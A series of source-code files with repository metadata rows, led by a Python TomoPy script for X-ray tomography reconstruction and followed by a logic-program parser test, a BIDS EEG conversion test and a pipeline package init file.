% (data.shape, white.shape, dark.shape))
## Normalize dataset using data_white and data_dark
if normalize:
print("Normalizing data ...")
# white = white.mean(axis=0).reshape(-1, *data.shape[1:])
# dark = dark.mean(axis=0).reshape(-1, *data.shape[1:])
# data = (data - dark) / (white - dark)
data = tomopy.normalize(data, white, dark, cutoff=None, ncore=_ncore, nchunk=None)[...]
## Remove stripes caused by dead pixels in the detector
if stripe_removal:
print("Removing stripes ...")
data = tomopy.remove_stripe_fw(data, level=stripe_removal, wname='db5', sigma=2,
pad=True, ncore=_ncore, nchunk=None)
# data = tomopy.remove_stripe_ti(data, nblock=0, alpha=1.5,
# ncore=None, nchunk=None)
# # Show preprocessed projection
# plt.figure("%s-prep" % projections_start)
# plt.imshow(d.data[0,:,:], cmap=cm.Greys_r)
# plt.savefig(out_dir+"/preprocess/%s-prep.jpg"
# % projections_start)
# # plt.show()
# continue
## Phase retrieval
if phase_retrieval:
print("Retrieving phase ...")
data = tomopy.retrieve_phase(data,
pixel_size=1e-4, dist=50, energy=20,
alpha=1e-3, pad=True, ncore=_ncore, nchunk=None)
## Determine and set the center of rotation
if opt_center or (rot_center == None):
### Using optimization method to automatically find the center
# d.optimize_center()
print("Optimizing center ...", end="")
sys.stdout.flush()
rot_center = tomopy.find_center(data, theta, ind=None, emission=True, init=None,
tol=0.5, mask=True, ratio=1.)
print("Done!")
print("center = %s" % rot_center)
if diag_center:
### Output the reconstruction results using a range of centers,
### and then manually find the optimal center.
# d.diagnose_center()
if not os.path.exists(diag_cent_dir):
os.makedirs(diag_cent_dir)
print("Testing centers ...", end="")
sys.stdout.flush()
tomopy.write_center(data, theta, dpath=diag_cent_dir,
cen_range=[center_start, center_end, center_step],
ind=None, emission=False, mask=False, ratio=1.)
print("Done!")
## Flip odd frames
if (cycle % 2):
data[...] = data[...,::-1]
rot_center = data.shape[-1] - rot_center_copy
else:
rot_center = rot_center_copy
## Reconstruction using FBP
print("Running gridrec ...", end="")
sys.stdout.flush()
recon = tomopy.recon(data, theta, center=rot_center, emission=False, algorithm='gridrec',
# num_gridx=None, num_gridy=None, filter_name='shepp',
ncore=_ncore, nchunk=_nchunk)
print("Done!")
## Collect background
# if cycle == 0:
# bg = recon
# elif cycle < 4:
# bg += recon
# else:
# recon -= bg/4.
# Write to stack of TIFFs.
if not os.path.exists(recon_dir):
os.makedirs(recon_dir)
out_fname = recon_dir+"/"+out_prefix+"t_%d" % (cycle + cycle_offset)
if "hdf" in output:
hdf_fname = out_fname + ".hdf5"
print("Writing reconstruction output file %s..."
% hdf_fname, end="")
sys.stdout.flush()
tomopy.write_hdf5(recon, fname=hdf_fname, gname='exchange', overwrite=False)
print("Done!")
if "tif" in output:
tiff_fname = out_fname + ".tiff"
print("Writing reconstruction tiff files %s ..."
% tiff_fname, end="")
sys.stdout.flush()
tomopy.write_tiff_stack(recon, fname=tiff_fname, axis=0, digit=5, start=0, overwrite=False)
print("Done!")
if "bin" in output:
bin_fname = out_fname + ".bin"
print("Writing reconstruction to binary files %s..."
% bin_fname, end="")
sys.stdout.flush()
recon.tofile(bin_fname)
def recon2(io_paras, data_paras, rot_center=None, normalize=True, stripe_removal=10, phase_retrieval=False,
opt_center=False, diag_center=False, output="tiff"):
# Input and output
datafile = io_paras.get('datafile')
path2white = io_paras.get('path2white', datafile)
path2dark = io_paras.get('path2dark', path2white)
out_dir = io_paras.get('out_dir')
diag_cent_dir = io_paras.get('diag_cent_dir', out_dir+"/center_diagnose/")
recon_dir = io_paras.get('recon_dir', out_dir+"/recon/")
out_prefix = io_paras.get('out_prefix', "recon_")
# Parameters of dataset
NumCycles = data_paras.get('NumCycles', 1) # Number of cycles used for recon
ProjPerCycle = data_paras.get('ProjPerCycle') # Number of projections per cycle, N_theta
cycle_offset = data_paras.get('cycle_offset', 0) # Offset in output cycle number
proj_start = data_paras.get('proj_start', 0) # Starting projection of reconstruction
proj_step = data_paras.get('proj_step')
z_start = data_paras.get('z_start', 0)
z_end = data_paras.get('z_end', z_start+1)
z_step = data_paras.get('z_step')
x_start = data_paras.get('x_start')
x_end = data_paras.get('x_end', x_start+1)
x_step = data_paras.get('x_step')
white_start = data_paras.get('white_start')
white_end = data_paras.get('white_end')
dark_start = data_paras.get('dark_start')
dark_end = data_paras.get('dark_end')
slice3 = slice(x_start, x_end, x_step)
rot_center_copy = rot_center
for cycle in xrange(NumCycles):
# Set start and end of each cycle
projections_start = cycle * ProjPerCycle + proj_start
projections_end = projections_start + ProjPerCycle
slice1 = slice(projections_start, projections_end, proj_step)
# Distribute z slices to processes
if z_step is None: # global z_step declaration is needed, because assignment is used below, therefore local variable is assumed by default.
z_step = 1
z_list = range(z_start, z_end, z_step)
for i in range(_rank, len(z_list), _nprocs):
z = z_list[i]
slice2 = slice(z, z+1)
slices = (slice1, slice2, slice3)
white_slices = (slice(white_start, white_end), slice2, slice3)
dark_slices = (slice(dark_start, dark_end), slice2, slice3)
print("Running cycle #%s (projs %s to %s, z = %s) on process %s of %s"
% (cycle, projections_start, projections_end, z, _rank, _nprocs))
# Read HDF5 file.
print("Reading datafile %s..." % datafile, end="")
sys.stdout.flush()
data, white, dark = reader.read_aps_2bm(datafile, slices, white_slices, dark_slices,
path2white=path2white, path2dark=path2dark)
theta = gen_theta(data.shape[0])
print("Done!")
print("Data shape = %s;\nwhite shape = %s;\ndark shape = %s."
% (data.shape, white.shape, dark.shape))
# data = tomopy.focus_region(data, dia=1560, xcoord=1150, ycoord=1080,
# center=rot_center, pad=False, corr=True)
# rot_center = None
# print("Data shape = %s;\nwhite shape = %s;\ndark shape = %s."
# % (data.shape, white.shape, dark.shape))
## Normalize dataset using data_white and data_dark
if normalize:
print("Normalizing data ...")
# white = white.mean(axis=0).reshape(-1, *data.shape[1:])
# dark = dark.mean(axis=0).reshape(-1, *data.shape[1:])
# data = (data - dark) / (white - dark)
data = tomopy.normalize(data, white, dark, cutoff=None, ncore=_ncore, nchunk=None)[...]
## Remove stripes caused by dead pixels in the detector
if stripe_removal:
print("Removing stripes ...")
data = tomopy.remove_stripe_fw(data, level=stripe_removal, wname='db5', sigma=2,
pad=True, ncore=_ncore, nchunk=None)
# data = tomopy.remove_stripe_ti(data, nblock=0, alpha=1.5,
# ncore=None, nchunk=None)
# # Show preprocessed projection
# plt.figure("%s-prep" % projections_start)
# plt.imshow(d.data[0,:,:], cmap=cm.Greys_r)
# plt.savefig(out_dir+"/preprocess/%s-prep.jpg"
# % projections_start)
# # plt.show()
# continue
## Phase retrieval
if phase_retrieval:
print("Retrieving phase ...")
data = tomopy.retrieve_phase(data,
pixel_size=6.5e-5, dist=33, energy=30,
alpha=1e-3, pad=True, ncore=_ncore, nchunk=None)
## Determine and set the center of rotation
if opt_center: # or (rot_center == None):
### Using optimization method to automatically find the center
# d.optimize_center()
print("Optimizing center ...", end="")
sys.stdout.flush()
rot_center = tomopy.find_center(data, theta, ind=None, emission=True, init=None,
tol=0.5, mask=True, ratio=1.)
print("Done!")
print("center = %s" % rot_center)
if diag_center:
### Output the reconstruction results using a range of centers,
### and then manually find the optimal center.
# d.diagnose_center()
if not os.path.exists(diag_cent_dir):
os.makedirs(diag_cent_dir)
print("Testing centers ...", end="")
sys.stdout.flush()
tomopy.write_center(data, theta, dpath=diag_cent_dir,
cen_range=[center_start, center_end, center_step],
ind=None, emission=False, mask=False, ratio=1.)
print("Done!")
## Flip odd frames
if (cycle % 2):
data[...] = data[...,::-1]
rot_center = data.shape[-1] - rot_center_copy
else:
rot_center = rot_center_copy
## Reconstruction using FBP
print("Running gridrec ...", end="")
sys.stdout.flush()
recon = tomopy.recon(data, theta, center=rot_center, emission=False, algorithm='gridrec',
# num_gridx=None, num_gridy=None, filter_name='shepp',
ncore=_ncore, nchunk=_nchunk)
print("Done!")
## Collect background
# if cycle == 0:
# bg = recon
# elif cycle < 4:
# bg += recon
# else:
# recon -= bg/4.
# Write to stack of TIFFs.
if not os.path.exists(recon_dir):
os.makedirs(recon_dir)
out_fname = recon_dir+"/"+out_prefix+"t_%d_z_%d" % (cycle + cycle_offset, z)
if "hdf" in output:
hdf_fname = out_fname + ".hdf5"
print("Writing reconstruction output file %s..."
% hdf_fname, end="")
sys.stdout.flush()
tomopy.write_hdf5(recon, fname=hdf_fname, gname='exchange', overwrite=False)
print("Done!")
if "tif" in output:
tiff_fname = out_fname + ".tiff"
print("Writing reconstruction tiff files %s ..."
% tiff_fname, end="")
sys.stdout.flush()
tomopy.write_tiff(recon, fname=tiff_fname, overwrite=False)
print("Done!")
if "bin" in output:
bin_fname = out_fname + ".bin"
print("Writing reconstruction to binary files %s..."
% bin_fname, end="")
sys.stdout.flush()
recon.tofile(bin_fname)
if _usempi:
comm.Barrier()
if _rank == 0:
print("All done!")
def center(io_paras, data_paras, center_start, center_end, center_step, diag_cycle=0,
mode='diag', normalize=True, stripe_removal=10, phase_retrieval=False):
# Input and output
datafile = io_paras.get('datafile')
path2white = io_paras.get('path2white', datafile)
path2dark = io_paras.get('path2dark', path2white)
out_dir = io_paras.get('out_dir')
diag_cent_dir = io_paras.get('diag_cent_dir', out_dir+"/center_diagnose/")
recon_dir = io_paras.get('recon_dir', out_dir+"/recon/")
out_prefix = io_paras.get('out_prefix', "recon_")
# Parameters of dataset
NumCycles = data_paras.get('NumCycles', 1) # Number of cycles used for recon
ProjPerCycle = data_paras.get('ProjPerCycle') # Number of projections per cycle, N_theta
cycle_offset = data_paras.get('cycle_offset', 0) # Offset in output cycle number
proj_start = data_paras.get('proj_start', 0) # Starting projection of reconstruction
proj_step = data_paras.get('proj_step')
z_start = data_paras.get('z_start', 0)
z_end = data_paras.get('z_end', z_start+1)
z_step = data_paras.get('z_step')
x_start = data_paras.get('x_start')
x_end = data_paras.get('x_end', x_start+1)
x_step = data_paras.get('x_step')
white_start = data_paras.get('white_start')
white_end = data_paras.get('white_end')
dark_start = data_paras.get('dark_start')
dark_end = data_paras.get('dark_end')
# TIMBIR parameters
NumSubCycles = data_paras.get('NumSubCycles', 1) # Number of subcycles in one cycle, K
SlewSpeed = data_paras.get('SlewSpeed', 0) # In deg/s
MinAcqTime = data_paras.get('MinAcqTime', 0) # In s
TotalNumCycles = data_paras.get('TotalNumCycles', 1) # Total number of cycles in the full scan data
ProjPerRecon = data_paras.get('ProjPerRecon', ProjPerCycle) # Number of projections per reconstruction
# Calculate thetas for interlaced scan
theta = gen_theta_timbir(NumSubCycles, ProjPerCycle, SlewSpeed, MinAcqTime, TotalNumCycles)
if ProjPerRecon is None:
ProjPerCycle = theta.size//TotalNumCycles
else:
ProjPerCycle = ProjPerRecon
print("Will use %s projections per reconstruction." % ProjPerCycle)
# Set start and end of each subcycle
projections_start = diag_cycle * ProjPerCycle + proj_start
projections_end = projections_start + ProjPerCycle
slice1 = slice(projections_start, projections_end, proj_step)
slice2 = slice(z_start, z_end, z_step)
slice3 = slice(x_start, x_end, x_step)
slices = (slice1, slice2, slice3)
white_slices = (slice(white_start, white_end), slice2, slice3)
dark_slices = (slice(dark_start, dark_end), slice2, slice3)
print("Running center diagnosis (projs %s to %s)"
% (projections_start, projections_end))
# Read HDF5 file.
print("Reading datafile %s..." % datafile, end="")
sys.stdout.flush()
data, white, dark = reader.read_aps_2bm(datafile, slices, white_slices, dark_slices,
path2white=path2white, path2dark=path2dark)
data += 1
# theta = gen_theta(data.shape[0])
print("Done!")
print("Data shape = %s;\nwhite shape = %s;\ndark shape = %s."
% (data.shape, white.shape, dark.shape))
## Normalize dataset using data_white and data_dark
if normalize:
data = tomopy.normalize(data, white, dark, cutoff=None, ncore=_ncore, nchunk=None)
## Remove stripes caused by dead pixels in the detector
if stripe_removal:
data = tomopy.remove_stripe_fw(data, level=stripe_removal, wname='db5',
sigma=2, pad=True, ncore=None, nchunk=None)
# data = tomopy.remove_stripe_ti(data, nblock=0, alpha=1.5,
# ncore=None, nchunk=None)
# # Show preprocessed projection
# plt.figure("%s-prep" % projections_start)
# plt.imshow(d.data[0,:,:], cmap=cm.Greys_r)
# plt.savefig(out_dir+"/preprocess/%s-prep.jpg"
# % projections_start)
# # plt.show()
# continue
## Phase retrieval
if phase_retrieval:
data = tomopy.retrieve_phase(data,
pixel_size=1.1e-4, dist=5, energy=25.7,
alpha=1e-3, pad=True, ncore=_ncore, nchunk=None)
## Determine and set the center of rotation
### Using optimization method to automatically find the center
# d.optimize_center()
if 'opti' in mode:
print("Optimizing center ...", end="")
sys.stdout.flush()
rot_center = tomopy.find_center(data, theta, ind=None, emission=True, init=None,
tol=0.5, mask=True, ratio=1.)
print("Done!")
print("center = %s" % rot_center)
### Output the reconstruction results using a range of centers,
### and then manually find the optimal center.
if 'diag' in mode:
if not os.path.exists(diag_cent_dir):
os.makedirs(diag_cent_dir)
print("Testing centers ...", end="")
sys.stdout.flush()
tomopy.write_center(data, theta, dpath=diag_cent_dir,
cen_range=[center_start, center_end, center_step],
ind=None, emission=False, mask=False, ratio=1.)
print("Done!")
def sweep_parameter(levels, sigmas, *args, **kwargs):
for level in levels:
for sigma in sigmas:
print("Running level = %s, sigma = %s" % (level, sigma))
kwargs['stripe_removal'] = level
kwargs['stripe_sigma'] = sigma
out_prefix = "recon_sr_l_%s_s_%s_" % (level, sigma)
args[0]['out_prefix'] = out_prefix
recon3(*args, **kwargs)
def recon3(io_paras, data_paras, rot_center=None, normalize=True, stripe_removal=10, stripe_sigma=2, phase_retrieval=False,
opt_center=False, diag_center=False, output="tiff", z_recon_size=None):
# Input and output
datafile = io_paras.get('datafile')
path2white = io_paras.get('path2white', datafile)
path2dark = io_paras.get('path2dark', path2white)
out_dir = io_paras.get('out_dir')
diag_cent_dir = io_paras.get('diag_cent_dir', out_dir+"/center_diagnose/")
recon_dir = io_paras.get('recon_dir', out_dir+"/recon/")
out_prefix = io_paras.get('out_prefix', "recon_")
# Parameters of dataset
NumCycles = data_paras.get('NumCycles', 1) # Number of cycles used for recon
ProjPerCycle = data_paras.get('ProjPerCycle') # Number of projections per cycle, N_theta
cycle_offset = data_paras.get('cycle_offset', 0) # Offset in output cycle number
proj_start = data_paras.get('proj_start', 0) # Starting projection of reconstruction
proj_step = data_paras.get('proj_step')
z_start = data_paras.get('z_start', 0)
z_end = data_paras.get('z_end', z_start+1)
z_step = data_paras.get('z_step')
x_start = data_paras.get('x_start')
x_end = data_paras.get('x_end', x_start+1)
x_step = data_paras.get('x_step')
white_start = data_paras.get('white_start')
white_end = data_paras.get('white_end')
dark_start = data_paras.get('dark_start')
dark_end = data_paras.get('dark_end')
# TIMBIR parameters
NumSubCycles = data_paras.get('NumSubCycles', 1) # Number of subcycles in one cycle, K
SlewSpeed = data_paras.get('SlewSpeed', 0) # In deg/s
MinAcqTime = data_paras.get('MinAcqTime', 0) # In s
TotalNumCycles = data_paras.get('TotalNumCycles', 1) # Total number of cycles in the full scan data
ProjPerRecon = data_paras.get('ProjPerRecon', ProjPerCycle) # Number of projections per reconstruction
# Calculate thetas for interlaced scan
theta = gen_theta_timbir(NumSubCycles, ProjPerCycle, SlewSpeed, MinAcqTime, TotalNumCycles)
if ProjPerRecon is None:
ProjPerCycle = theta.size//TotalNumCycles
else:
ProjPerCycle = ProjPerRecon
print("Will use %s projections per reconstruction." % ProjPerCycle)
# Distribute z slices to processes
if z_step is None:
z_step = 1
z_pool = get_pool(z_start, z_end, z_step, z_chunk_size=z_recon_size, fmt='slice')
slice3 = slice(x_start, x_end, x_step)
rot_center_copy = rot_center
for cycle in xrange(NumCycles):
# Set start and end of each cycle
projections_start = cycle * ProjPerCycle + proj_start
projections_end = projections_start + ProjPerCycle
slice1 = slice(projections_start, projections_end, proj_step)
# Setup continuous output
if "cont" in output:
if not os.path.exists(recon_dir):
os.makedirs(recon_dir)
cont_fname = recon_dir+"/"+out_prefix+"t_%d_z_%d_%d.bin" \
% (cycle + cycle_offset, z_start, z_end)
cont_file = file(cont_fname, 'wb')
# Distribute z slices to processes
for i in range(_rank, len(z_pool), _nprocs):
slice2 = z_pool[i]
slices = (slice1, slice2, slice3)
white_slices = (slice(white_start, white_end), slice2, slice3)
dark_slices = (slice(dark_start, dark_end), slice2, slice3)
print("Running cycle #%s (projs %s to %s, z = %s - %s) on process %s of %s"
% (cycle, projections_start, projections_end, slice2.start, slice2.stop, _rank, _nprocs))
# Read HDF5 file.
print("Reading datafile %s..." % datafile, end="")
sys.stdout.flush()
data, white, dark = reader.read_aps_2bm(datafile, slices, white_slices, dark_slices,
path2white=path2white, path2dark=path2dark)
# data += 1
# theta = gen_theta(data.shape[0])
print("Done!")
print("Data shape = %s;\nwhite shape = %s;\ndark shape = %s."
% (data.shape, white.shape, dark.shape))
# data = tomopy.focus_region(data, dia=1560, xcoord=1150, ycoord=1080,
# center=rot_center, pad=False, corr=True)
# rot_center = None
# print("Data shape = %s;\nwhite shape = %s;\ndark shape = %s."
# % (data.shape, white.shape, dark.shape))
## Normalize dataset using data_white and data_dark
if normalize:
print("Normalizing data ...")
# white = white.mean(axis=0).reshape(-1, *data.shape[1:])
# dark = dark.mean(axis=0).reshape(-1, *data.shape[1:])
# data = (data - dark) / (white - dark)
data = tomopy.normalize(data, white, dark, cutoff=None, ncore=_ncore, nchunk=_nchunk)[...]
## Remove stripes caused by dead pixels in the detector
if stripe_removal:
print("Removing stripes ...")
data = tomopy.remove_stripe_fw(data, level=stripe_removal, wname='db5', sigma=stripe_sigma,
pad=True, ncore=_ncore, nchunk=_nchunk)
# data = tomopy.remove_stripe_ti(data, nblock=0, alpha=1.5,
# ncore=None, nchunk=None)
# # Show preprocessed projection
# plt.figure("%s-prep" % projections_start)
# plt.imshow(d.data[0,:,:], cmap=cm.Greys_r)
# plt.savefig(out_dir+"/preprocess/%s-prep.jpg"
# % projections_start)
# # plt.show()
# continue
## Phase retrieval
if phase_retrieval:
print("Retrieving phase ...")
data = tomopy.retrieve_phase(data,
pixel_size=1.1e-4, dist=6, energy=25.7,
alpha=1e-2, pad=True, ncore=_ncore, nchunk=_nchunk)
## Determine and set the center of rotation
if opt_center: # or (rot_center == None):
### Using optimization method to automatically find the center
# d.optimize_center()
print("Optimizing center ...", end="")
sys.stdout.flush()
rot_center = tomopy.find_center(data, theta, ind=None, emission=True, init=None,
tol=0.5, mask=True, ratio=1.)
print("Done!")
print("center = %s" % rot_center)
if diag_center:
### Output the reconstruction results using a range of centers,
### and then manually find the optimal center.
# d.diagnose_center()
if not os.path.exists(diag_cent_dir):
os.makedirs(diag_cent_dir)
print("Testing centers ...", end="")
sys.stdout.flush()
tomopy.write_center(data, theta, dpath=diag_cent_dir,
cen_range=[center_start, center_end, center_step],
ind=None, emission=False, mask=False, ratio=1.)
print("Done!")
## Flip odd frames
# if (cycle % 2):
# data[...] = data[...,::-1]
# rot_center = data.shape[-1] - rot_center_copy
# else:
# rot_center = rot_center_copy
## Reconstruction using FBP
print("Running gridrec ...", end="")
sys.stdout.flush()
recon = tomopy.recon(data, theta[slice1], center=rot_center, emission=False, algorithm='gridrec',
# num_gridx=None, num_gridy=None, filter_name='shepp',
ncore=_ncore, nchunk=_nchunk)
print("Done!")
## Collect background
# if cycle == 0:
# bg = recon
# elif cycle < 4:
# bg += recon
# else:
# recon -= bg/4.
# Write to stack of TIFFs.
if not os.path.exists(recon_dir):
os.makedirs(recon_dir)
out_fname = recon_dir+"/"+out_prefix+"t_%d_z_" % (cycle + cycle_offset)
if "hdf" in output:
hdf_fname = out_fname + "%d_%d.hdf5" % (slice2.start, slice2.stop)
print("Writing reconstruction output file %s..."
% hdf_fname, end="")
sys.stdout.flush()
tomopy.write_hdf5(recon, fname=hdf_fname, gname='exchange', overwrite=False)
print("Done!")
if "tif" in output:
if "stack" in output: # single stacked file for multiple z
tiff_fname = out_fname + "%d_%d.tiff" % (slice2.start, slice2.stop)
print("Writing reconstruction tiff files %s ..."
% tiff_fname, end="")
sys.stdout.flush()
tomopy.write_tiff(recon, fname=tiff_fname, overwrite=False)
print("Done!")
else: # separate files for different z
for iz, z in enumerate(range(slice2.start, slice2.stop, slice2.step)):
tiff_fname = out_fname + "%d.tiff" % z
print("Writing reconstruction tiff files %s ..."
% tiff_fname, end="")
sys.stdout.flush()
tomopy.write_tiff(recon[iz], fname=tiff_fname, overwrite=False)
print("Done!")
if "bin" in output:
bin_fname = out_fname + "%d_%d.bin" % (slice2.start, slice2.stop)
print("Writing reconstruction to binary files %s..."
% bin_fname, end="")
sys.stdout.flush()
recon.tofile(bin_fname)
if "cont" in output:
print("Writing reconstruction to binary files %s..."
% cont_fname, end="")
sys.stdout.flush()
recon.tofile(cont_file)
print("Done!")
if "cont" in output:
cont_file.close()
if _usempi:
comm.Barrier()
if _rank == 0:
print("All done!")
def get_pool(z_start, z_end, z_step=1, z_chunk_size=None, fmt='slice'):
if fmt == 'list':
z_list = range(z_start, z_end, z_step)
if z_chunk_size is not None:
npool = len(z_list) // z_chunk_size + 1
z_pool = [z_list[i:i+z_chunk_size] for i in range(npool)]
else:
z_pool = z_list
else:
nz = (z_end - z_start - 1) // z_step + 1
if z_chunk_size is not None:
npool = nz // z_chunk_size + bool(nz % z_chunk_size)
z_pool = [slice(z_start + i * z_step * z_chunk_size,
z_start + (i + 1) * z_step * z_chunk_size,
z_step) for i in range(npool - 1)]
z_pool += [slice(z_start + (npool - 1) * z_step * z_chunk_size,
z_end, z_step)]
else:
z_pool = [slice(z_start, z_end, z_step)]
return z_pool
def image_normalize(data, dtype=int, vmax=255, cutoffmin=None, cutoffmax=None):
if cutoffmin is not None:
data[data<cutoffmin] = cutoffmin
if cutoffmax is not None:
data[data>cutoffmax] = cutoffmax
data = (data - data.min())/(data.max()-data.min())*vmax
if dtype is int:
data = np.array(data * (vmax+1), dtype=int)
data[data==(vmax+1)] = vmax
return data
| 44.243278
| 147
| 0.57154
| 4,171
| 34,554
| 4.526253
| 0.080796
| 0.041528
| 0.044494
| 0.023412
| 0.880661
| 0.870809
| 0.856295
| 0.840934
| 0.83336
| 0.829281
| 0
| 0.013601
| 0.314841
| 34,554
| 780
| 148
| 44.3
| 0.783823
| 0.198964
| 0
| 0.767892
| 0
| 0.003868
| 0.108716
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023211
| false
| 0
| 0.017408
| 0.001934
| 0.048356
| 0.154739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ed1b139dbd9f64a92c438fed584322fc42344fab
| 151
|
py
|
Python
|
tests/parser/grounding.duplicates.1b.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/grounding.duplicates.1b.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/grounding.duplicates.1b.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
a | b.
foo(X,Y) :- a, X = Y + 1. %#int(Y), a, X = Y + 1.
"""
output = """
a | b.
foo(X,Y) :- a, X = Y + 1. %#int(Y), a, X = Y + 1.
"""
| 16.777778
| 50
| 0.324503
| 32
| 151
| 1.53125
| 0.28125
| 0.244898
| 0.244898
| 0.326531
| 0.77551
| 0.77551
| 0.77551
| 0.77551
| 0.77551
| 0.77551
| 0
| 0.038835
| 0.317881
| 151
| 8
| 51
| 18.875
| 0.436893
| 0
| 0
| 0.75
| 0
| 0.25
| 0.789116
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
ed53cf6af4b4f371b108767c97b80b3070ac12d0
| 3,043
|
py
|
Python
|
package_test.py
|
Aaronearlerichardson/BIDS_coding
|
78feb08ed8ad6b782cae19591b4df5e8547b99bb
|
[
"MIT"
] | 1
|
2021-04-29T18:05:41.000Z
|
2021-04-29T18:05:41.000Z
|
package_test.py
|
Aaronearlerichardson/BIDS_coding
|
78feb08ed8ad6b782cae19591b4df5e8547b99bb
|
[
"MIT"
] | 19
|
2021-04-29T18:27:49.000Z
|
2022-02-09T20:38:03.000Z
|
package_test.py
|
Aaronearlerichardson/BIDS_coding
|
78feb08ed8ad6b782cae19591b4df5e8547b99bb
|
[
"MIT"
] | 1
|
2021-04-29T23:02:01.000Z
|
2021-04-29T23:02:01.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from BIDS_converter.data2bids import Data2Bids
import shutil
import os
import tarfile
def test_D52():
os.makedirs("Data/Phoneme_Sequencing/BIDS", exist_ok=True)
error = None
files = None
print("Unzipping: D52 201213 COGAN_PHONEMESEQUENCE.edf.tar.xz")
with tarfile.open("Data/Phoneme_Sequencing/eeg_data/D52 201213 COGAN_PHONEMESEQUENCE.edf.tar.xz", mode="r:xz") as f:
f.extractall(path="Data/Phoneme_Sequencing/sourcedata/D52")
try:
Data2Bids(input_dir='Data/Phoneme_Sequencing/sourcedata/D52', output_dir='Data/Phoneme_Sequencing/BIDS',
stim_dir="Data/Phoneme_Sequencing/sourcedata/stimuli", overwrite=True, verbose=True).run()
files = [x for x in os.listdir('Data/Phoneme_Sequencing/BIDS/sub-D0052')]
except Exception as e:
error = e
finally:
while os.path.isdir("Data/Phoneme_Sequencing/BIDS"):
shutil.rmtree("Data/Phoneme_Sequencing/BIDS", ignore_errors=True)
os.chmod("Data/Phoneme_Sequencing/sourcedata/D52/D52 201213 COGAN_PHONEMESEQUENCE.edf", 0o777)
os.remove("Data/Phoneme_Sequencing/sourcedata/D52/D52 201213 COGAN_PHONEMESEQUENCE.edf")
if error:
raise error
else:
return files
def test_D48():
os.makedirs("Data/Phoneme_Sequencing/BIDS", exist_ok=True)
error = None
files = None
print("Unzipping: D48 200906 Cogan_PhonemeSequence_Session1.edf.tar.xz")
with tarfile.open("Data/Phoneme_Sequencing/eeg_data/D48 200906 Cogan_PhonemeSequence_Session1.edf.tar.xz",
mode="r:xz") as f:
f.extractall(path="Data/Phoneme_Sequencing/sourcedata/D48")
print("Unzipping: D48 200908 Cogan_PhonemeSequence_Session2.edf.tar.xz")
with tarfile.open("Data/Phoneme_Sequencing/eeg_data/D48 200908 Cogan_PhonemeSequence_Session2.edf.tar.xz",
mode="r:xz") as f:
f.extractall(path="Data/Phoneme_Sequencing/sourcedata/D48")
try:
Data2Bids(input_dir='Data/Phoneme_Sequencing/sourcedata/D48', output_dir='Data/Phoneme_Sequencing/BIDS',
stim_dir="Data/Phoneme_Sequencing/sourcedata/stimuli", overwrite=True, verbose=True).run()
files = [x for x in os.listdir('Data/Phoneme_Sequencing/BIDS/sub-D0048')]
except Exception as e:
error = e
finally:
while os.path.isdir("Data/Phoneme_Sequencing/BIDS"):
shutil.rmtree("Data/Phoneme_Sequencing/BIDS", ignore_errors=True)
os.chmod("Data/Phoneme_Sequencing/sourcedata/D48/D48 200906 Cogan_PhonemeSequence_Session1.edf", 0o777)
os.chmod("Data/Phoneme_Sequencing/sourcedata/D48/D48 200908 Cogan_PhonemeSequence_Session2.edf", 0o777)
os.remove("Data/Phoneme_Sequencing/sourcedata/D48/D48 200906 Cogan_PhonemeSequence_Session1.edf")
os.remove("Data/Phoneme_Sequencing/sourcedata/D48/D48 200908 Cogan_PhonemeSequence_Session2.edf")
if error:
raise error
else:
return files
| 41.684932
| 120
| 0.703911
| 387
| 3,043
| 5.374677
| 0.21447
| 0.1375
| 0.2625
| 0.19375
| 0.928365
| 0.924038
| 0.924038
| 0.896154
| 0.728365
| 0.728365
| 0
| 0.062954
| 0.185672
| 3,043
| 72
| 121
| 42.263889
| 0.776433
| 0.014131
| 0
| 0.581818
| 0
| 0
| 0.499666
| 0.449633
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036364
| false
| 0
| 0.072727
| 0
| 0.145455
| 0.054545
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ed6fe212a92295eeb08164cb3305a271b2cab6cd
| 619
|
py
|
Python
|
experiments/pipelines/__init__.py
|
DS3Lab/datascope
|
6118cc2ab34d54e9786015d99e93ad31fe02f4a8
|
[
"MIT"
] | 1
|
2022-03-27T15:04:02.000Z
|
2022-03-27T15:04:02.000Z
|
experiments/pipelines/__init__.py
|
Eastsouthern/datascope
|
733c0debb561f9c9478b8fc91afe2f71c62adb6c
|
[
"MIT"
] | null | null | null |
experiments/pipelines/__init__.py
|
Eastsouthern/datascope
|
733c0debb561f9c9478b8fc91afe2f71c62adb6c
|
[
"MIT"
] | 3
|
2022-02-08T17:44:24.000Z
|
2022-03-27T15:03:50.000Z
|
from .base import (
Pipeline,
IdentityPipeline,
StandardScalerPipeline,
LogScalerPipeline,
PcaPipeline,
PcaSvdPipeline,
KMeansPipeline,
GaussBlurPipeline,
HogTransformPipeline,
TfidfPipeline,
ToLowerUrlRemovePipeline,
)
from .models import get_model, ModelType
__all__ = [
"Pipeline",
"IdentityPipeline",
"StandardScalerPipeline",
